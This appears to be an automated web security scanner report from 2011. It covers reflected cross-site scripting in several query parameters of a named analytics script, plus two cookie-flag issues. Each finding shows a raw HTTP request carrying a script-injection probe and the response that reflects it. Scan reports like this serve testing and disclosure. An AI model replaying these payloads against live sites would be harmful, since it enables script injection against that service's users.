1. Cross-site scripting (reflected)
1.1. http://b.scorecardresearch.com/beacon.js [c1 parameter]
1.2. http://b.scorecardresearch.com/beacon.js [c10 parameter]
1.3. http://b.scorecardresearch.com/beacon.js [c15 parameter]
1.4. http://b.scorecardresearch.com/beacon.js [c2 parameter]
1.5. http://b.scorecardresearch.com/beacon.js [c3 parameter]
1.6. http://b.scorecardresearch.com/beacon.js [c4 parameter]
1.7. http://b.scorecardresearch.com/beacon.js [c5 parameter]
1.8. http://b.scorecardresearch.com/beacon.js [c6 parameter]
2. Cookie scoped to parent domain
3. Cookie without HttpOnly flag set
Severity: | High |
Confidence: | Certain |
Host: | http://b.scorecardre |
Path: | /beacon.js |
GET /beacon.js?c1=2395a6<script>alert(1)< Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://sharepoint.alltop Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UID=6d0f24-24.143.206.42 |
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Tue, 15 Mar 2011 20:44:02 GMT Date: Tue, 08 Mar 2011 20:44:02 GMT Connection: close Content-Length: 3599 if(typeof COMSCORE=="undefined") COMSCORE.beacon({c1:"2395a6<script>alert(1)< |
Severity: | High |
Confidence: | Certain |
Host: | http://b.scorecardre |
Path: | /beacon.js |
GET /beacon.js?c1=8&c2 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://sharepoint.alltop Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UID=6d0f24-24.143.206.42 |
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Tue, 15 Mar 2011 20:44:04 GMT Date: Tue, 08 Mar 2011 20:44:04 GMT Connection: close Content-Length: 3599 if(typeof COMSCORE=="undefined") COMSCORE.beacon({c1:"8", c2:"3005693", c3:"3", c4:"http://alltop.com/", c5:"", c6:"", c10:"e1e95<script>alert(1)< |
Severity: | High |
Confidence: | Certain |
Host: | http://b.scorecardre |
Path: | /beacon.js |
GET /beacon.js?c1=2&c2 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://sharepoint.alltop Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UID=6d0f24-24.143.206.42 |
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Tue, 15 Mar 2011 20:44:03 GMT Date: Tue, 08 Mar 2011 20:44:03 GMT Connection: close Content-Length: 3599 if(typeof COMSCORE=="undefined") COMSCORE.beacon({c1:"2", c2:"3005693", c3:"3", c4:"http://alltop.com/", c5:"", c6:"", c10:"", c15:"efdfe<script>alert(1)< |
Severity: | High |
Confidence: | Certain |
Host: | http://b.scorecardre |
Path: | /beacon.js |
GET /beacon.js?c1=2&c2 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://sharepoint.alltop Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UID=6d0f24-24.143.206.42 |
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Tue, 15 Mar 2011 20:44:02 GMT Date: Tue, 08 Mar 2011 20:44:02 GMT Connection: close Content-Length: 3599 if(typeof COMSCORE=="undefined") COMSCORE.beacon({c1:"2", c2:"3005693dbf89<script>alert(1)< |
Severity: | High |
Confidence: | Certain |
Host: | http://b.scorecardre |
Path: | /beacon.js |
GET /beacon.js?c1=2&c2 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://sharepoint.alltop Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UID=6d0f24-24.143.206.42 |
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Tue, 15 Mar 2011 20:44:02 GMT Date: Tue, 08 Mar 2011 20:44:02 GMT Connection: close Content-Length: 3599 if(typeof COMSCORE=="undefined") COMSCORE.beacon({c1:"2", c2:"3005693", c3:"3ba9aa<script>alert(1)< |
Severity: | High |
Confidence: | Certain |
Host: | http://b.scorecardre |
Path: | /beacon.js |
GET /beacon.js?c1=2&c2 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://sharepoint.alltop Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UID=6d0f24-24.143.206.42 |
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Tue, 15 Mar 2011 20:44:02 GMT Date: Tue, 08 Mar 2011 20:44:02 GMT Connection: close Content-Length: 3599 if(typeof COMSCORE=="undefined") COMSCORE.beacon({c1:"2", c2:"3005693", c3:"3", c4:"http://alltop.com/15e2a<script>alert(1)< |
Severity: | High |
Confidence: | Certain |
Host: | http://b.scorecardre |
Path: | /beacon.js |
GET /beacon.js?c1=2&c2 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://sharepoint.alltop Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UID=6d0f24-24.143.206.42 |
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Tue, 15 Mar 2011 20:44:03 GMT Date: Tue, 08 Mar 2011 20:44:03 GMT Connection: close Content-Length: 3599 if(typeof COMSCORE=="undefined") COMSCORE.beacon({c1:"2", c2:"3005693", c3:"3", c4:"http://alltop.com/", c5:"df83e<script>alert(1)< |
Severity: | High |
Confidence: | Certain |
Host: | http://b.scorecardre |
Path: | /beacon.js |
GET /beacon.js?c1=2&c2 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://sharepoint.alltop Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UID=6d0f24-24.143.206.42 |
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Tue, 15 Mar 2011 20:44:03 GMT Date: Tue, 08 Mar 2011 20:44:03 GMT Connection: close Content-Length: 3599 if(typeof COMSCORE=="undefined") COMSCORE.beacon({c1:"2", c2:"3005693", c3:"3", c4:"http://alltop.com/", c5:"", c6:"f40ae<script>alert(1)< |
Severity: | Information |
Confidence: | Certain |
Host: | http://b.scorecardre |
Path: | /b |
GET /b?rn=1299616563379&c7 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.msn.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UID=6d0f24-24.143.206.42 |
HTTP/1.1 204 No Content Content-Length: 0 Date: Tue, 08 Mar 2011 20:36:06 GMT Connection: close Set-Cookie: UID=6d0f24-24.143.206.42 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC" Expires: Mon, 01 Jan 1990 00:00:00 GMT Pragma: no-cache Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate Server: CS |
Severity: | Information |
Confidence: | Certain |
Host: | http://b.scorecardre |
Path: | /b |
GET /b?rn=1299616563379&c7 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.msn.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UID=6d0f24-24.143.206.42 |
HTTP/1.1 204 No Content Content-Length: 0 Date: Tue, 08 Mar 2011 20:36:06 GMT Connection: close Set-Cookie: UID=6d0f24-24.143.206.42 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC" Expires: Mon, 01 Jan 1990 00:00:00 GMT Pragma: no-cache Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate Server: CS |